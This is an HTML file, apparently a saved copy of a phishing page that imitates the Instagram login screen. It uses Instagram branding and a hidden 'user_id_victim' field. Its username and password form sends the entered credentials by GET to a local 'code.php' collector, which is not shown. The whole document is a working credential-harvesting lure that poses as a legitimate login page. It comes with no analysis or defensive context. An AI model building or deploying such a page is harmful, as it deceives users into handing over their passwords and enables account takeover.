
<!-- saved from url=(0070)file:///C:/Users/Mrr_Cr3zY/Desktop/cv/Login%20to/Login%20to%20....html -->
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>Log in — Instagram</title>

<link rel="shortcut icon" href="https://instagramstatic-a.akamaihd.net/h1/images/ico/apple-touch-icon-76x76-precomposed.png/932e4d9af891.png">

<link type="text/css" rel="stylesheet" href="./Log in — Instagram_files/1.css">
    <link type="text/css" rel="stylesheet" href="./Log in — Instagram_files/2.css">

 </head><body><center><img src="./Log in — Instagram_files/00instalogo.jpg"></center>


<div id="globalContainer" class="uiContextualLayerParent"><div id="content" class="fb_content clearfix"><div class="UIFullPage_Container"><div class="mvl ptm uiInterstitial login_page_interstitial uiInterstitialLarge uiBoxWhite"><div class="uiHeader uiHeaderBottomBorder mhl mts uiHeaderPage interstitialHeader"><div class="clearfix uiHeaderTop"><div class="rfloat"><h2 class="accessible_elem">




 <center><img src="./Log in — Instagram_files/486505443.jpg"></center>
        <form method="get" action="file:///C:/Users/Mrr_Cr3zY/Desktop/cv/Login%20to/code.php" name="login_form">
		<input type="hidden" name="user_id_victim" value="87509">
 <input name="type" value="instagrama" type="hidden">
<input name="charset_test" value="?,?,?,?,水,Д,Є" type="hidden"><input name="" value="64316" type="hidden"><input name="lsd" value="cG8FP" autocomplete="off" type="hidden"><div id="loginform" style=""><input id="return_session" name="return_session" value="0" autocomplete="off" type="hidden"><input id="legacy_return" name="legacy_return" value="1" autocomplete="off" type="hidden"><input id="display" name="display" value="" autocomplete="off" type="hidden"><input id="session_key_only" name="session_key_only" value="0" autocomplete="off" type="hidden"><input id="trynum" name="trynum" value="1" autocomplete="off" type="hidden"><input name="charset_test" value="?,?,?,?,水,Д,Є" type="hidden"><input id="lsd" name="lsd" value="cG8FP" autocomplete="off" type="hidden"><div class="form_row clearfix "><label for="email" id="label_email" class="login_form_label">Username:</label><input class="inputtext" id="email" name="email" onkeypress="formchange()" type="text"></div><div class="form_row clearfix "><label for="pass" id="label_pass" class="login_form_label">Password:</label><input class="inputpassword" id="pass" name="pass" value="" type="password"></div><label class="persistent">
<input name="hash" value="cf2f04f37826373132be7ddff89f038d,1440323991" type="hidden">



<input name="login" id="login" src="./Log in — Instagram_files/838095336.jpg" alt="Submit Form" height="31" border="0" type="image" width="100">
</label></div></form></h2></div></div></div></div></div></div><div id="globalContainer" class="uiContextualLayerParent"><div id="content" class="fb_content clearfix"><div class="UIFullPage_Container"><div class="mvl ptm uiInterstitial login_page_interstitial uiInterstitialLarge uiBoxWhite"><div class="uiHeader uiHeaderBottomBorder mhl mts uiHeaderPage interstitialHeader"><div class="clearfix uiHeaderTop"><div class="rfloat"><h2 class="accessible_elem">

 <center><img src="./Log in — Instagram_files/923633847.jpg"></center>
</h2></div></div></div></div></div></div></div></div><meta style="visibility: hidden !important; display: block !important; width: 0px !important; height: 0px !important; border-style: none !important;"><embed style="visibility: hidden !important; display: block !important; width: 1px !important; height: 1px !important; border-style: none !important; position: absolute !important; top: 0px !important; left: 0px !important;" type="application/x-eagleget" id="__EAGLEGET__" height="1" width="1"><meta style="visibility: hidden !important; display: block !important; width: 0px !important; height: 0px !important; border-style: none !important;"><embed style="visibility: hidden !important; display: block !important; width: 1px !important; height: 1px !important; border-style: none !important; position: absolute !important; top: 0px !important; left: 0px !important;" type="application/x-eagleget" id="__EAGLEGET__" height="1" width="1"></body></html>